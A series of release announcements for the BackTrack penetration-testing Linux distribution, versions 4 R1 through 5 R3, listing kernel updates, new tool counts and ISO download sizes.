2012-08-13 Distribution Release: BackTrack 5 R3 Offensive Security has released BackTrack 5 R3, an updated version of the project's Ubuntu-based distribution with a collection of security and forensics tools: "The time has come to refresh our security tool arsenal - BackTrack 5 R3 has been released. R3 focuses on bug fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated - 'Physical Exploitation', which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection. Together with our usual KDE and GNOME, 32/64-bit ISO images, we have released a single VMware Image (GNOME, 32-bit)." Here is the full release announcement. Download: BT5R3-GNOME-32.iso (3,142MB, MD5, torrent), BT5R3-KDE-32.iso (3,172MB, MD5,torrent), BT5R3-GNOME-64.iso (3,153MB, MD5, torrent), BT5R3-KDE-64.iso(3,194MB, MD5, torrent).
2012-03-02 Distribution Release: BackTrack 5 R2 The second revision of BackTrack 5, an Ubuntu-based distribution with a collection of tools for penetration testing and ethical hacking, has been released: "After months of development, bug fixes, upgrades, and the addition of 42 new tools, we are happy to announce that the full release of BackTrack 5 R2 available for download now. Running our custom-built 3.2.6 kernel with the best wireless support available, this is our fastest and best release of BackTrack yet. In the past few weeks, we have had a flood of submissions to our BackTrack Redmine tracker with submissions for many new tools and dozens of packages that needed to be updated and this has helped to make this one of the strongest releases we've ever had." Here is the full release announcement. Download links: BT5R2-GNOME-32.iso (2,588MB, MD5, torrent),BT5R2-KDE-32.iso (2,673MB, MD5, torrent), BT5R2-GNOME-64.iso (2,634MB, MD5,torrent), BT5R2-KDE-64.iso (2,681MB, MD5, torrent).
2011-08-23 Distribution Release: BackTrack 5 R1 An updated release of BackTrack 5, an Ubuntu-based distribution with specialist software designed for penetration testing, was announced (and released via BitTorrent) last week. Today direct downloads of ISO images are also possible. Here is a brief extract from the official release announcement: "We're finally ready to release BackTrack 5 R1. This HOWTOs on our Wiki in the next few days, such as VMware tool installation, alternate compat-wireless setups, etc. The kernel was updated to 2.6.39.4 and includes the relevant injection patches. We are really happy with this release, and believe that, as with every release, this is our best one yet. Some pesky issues such as rfkill in VMware with rtl8187 have been fixed and this provides for a much more solid experience with BackTrack." Download links: BT5R1-GNOME-32.iso (1,952MB, MD5, torrent), BT5R1-KDE-32.iso (2,037MB, MD5,torrent), BT5R1-GNOME-64.iso (1,984MB, MD5, torrent), BT5R1-KDE-64.iso(2,028MB, MD5, torrent).
2011-05-10 Distribution Release: BackTrack 5 Offensive Security has announced the release of BackTrack 5, an Ubuntu-based security distribution providing a collection of specialist tools for penetration testing and forensic analysis: "The BackTrack development team has worked furiously in the past months on BackTrack 5, code name 'revolution'. Today, we are proud to release our work to the public, and then rest for a couple of weeks. This new revision has been built from scratch, and boasts several major improvements over all our previous releases. Based on Ubuntu 10.04 LTS, Linux kernel 2.6.38, patched with all relevant wireless injection patches. Fully open source and GPL compliant." Here is the brief release announcement. Download (MD5) the live DVD image with your preferred desktop and architecture: BT5-GNOME-32.iso (1,956MB, torrent), BT5-KDE-32.iso (1,884MB, torrent), BT5-GNOME-64.iso (1,919MB, torrent), BT5-KDE-64.iso (1,850MB, torrent).
2010-11-23 Distribution Release: BackTrack 4 R2 Offensive Security has announced the release of the second respin of BackTrack 4, an Ubuntu-based distribution featuring a collection of security tools for digital forensics and penetration testing: "Yes, the time has come again -- for a new kernel, and a new release of BackTrack. Code-named 'Nemesis', this release is our finest as yet, with faster desktop responsiveness, better hardware support, broader wireless card support, and streamlined work environment. The run down: Linux kernel 2.6.35.8 with a much improved mac80211 stack; USB 3.0 support; all wireless injection patches applied, maximum support for wireless attacks; a revamped Fluxbox environment for the KDE challenged; Metasploit rebuilt from scratch, MySQL db_drivers working out of the box; updated old packages, added new ones; new BackTrack Wiki with better documentation and support...." Read the full release announcement for further details. Download (MD5): bt4-r2.iso (1,941MB, torrent).
2010-08-11 Distribution Release: BackTrack 4 R1 BackTrack 4 R1, a Linux-based penetration testing arsenal for security professionals, has been released: "The BackTrack Team is proud to announce the public release of BackTrack 4 R1. At the risk of sounding like a broken record, we believe this version is by far the best version released to date. With a shiny new 2.6.34 kernel, there are many significant improvements, such as expanded hardware support and improved desktop responsiveness. Tools have been updated system-wide, and a full Fluxbox desktop environment has been added. A walk-around for the rt28xx driver has been implemented. The VMWare version has complete integration with VMWare Tools, which provides a seamless interaction with BackTrack in a virtual environment...." Read the full release announcement and check some screenshots. Download (MD5)the live DVD image: bt4-r1.iso (1,922MB, torrent).

Read more

by Malik korrich ~ 0 commentaires